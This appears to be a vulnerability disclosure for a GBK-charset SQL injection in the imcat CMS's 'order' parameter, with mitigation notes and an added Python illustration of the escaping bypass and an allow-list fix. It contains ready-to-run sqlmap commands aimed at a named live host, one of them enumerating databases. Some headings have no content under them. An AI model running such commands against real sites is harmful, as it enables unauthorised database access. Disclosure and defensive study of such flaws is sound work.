Use sqlmap (http://sqlmap.org/) with the sqlmap tamper script: unmagicquotes
payload: sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes'
sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes' --dbs
GET databases;
Build and install imcat and test the vuln:
The Vuln-src-code:
Because the PHP code sets the database charset=GBK, this bypasses addslashes or GPC.
Safety up:
MySQL database charset UTF-8
Check HTTP input (GET/POST) data and filter what is dangerous.
Exploit vulnerability:

Test parameter: order
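Added example, not part of the original report and not imcat's code: a byte-level model of why a GBK connection charset defeats addslashes-style escaping while UTF-8 does not, followed by an allow-list check for a sort parameter. The function names, the constructed sample bytes and the column names in ALLOWED_ORDER are assumptions made for illustration.

```python
# Added illustration; names and sample data are hypothetical, not from imcat.

def addslashes(raw: bytes) -> bytes:
    """Byte-wise model of PHP addslashes(): backslash before ', ", \\ and NUL."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(0x30 if b == 0x00 else b)  # NUL is written as \0
    return bytes(out)


def unescaped_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes with no preceding backslash once the server
    decodes the bytes in the given connection charset."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2          # a backslash consumes the character after it
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


# Constructed sample: a GBK lead byte followed by a single quote.
SAMPLE = b"\xbf'"

# Escaping yields BF 5C 27. GBK reads BF 5C as one two-byte character,
# so the backslash disappears and the quote is left bare. In UTF-8 the
# byte BF is invalid on its own, the backslash survives, and the quote
# stays escaped.

# Sort columns cannot be bound as query parameters, so compare the
# request value against a fixed allow-list (hypothetical column names).
ALLOWED_ORDER = {"id", "created", "title"}


def safe_order(value: str, default: str = "id") -> str:
    """Return value only if it is a known column name, else the default."""
    return value if value in ALLOWED_ORDER else default


if __name__ == "__main__":
    esc = addslashes(SAMPLE)
    print(esc.hex(), unescaped_quotes(esc, "gbk"), unescaped_quotes(esc, "utf-8"))
    print(safe_order("created"), safe_order("123 or anything else"))
```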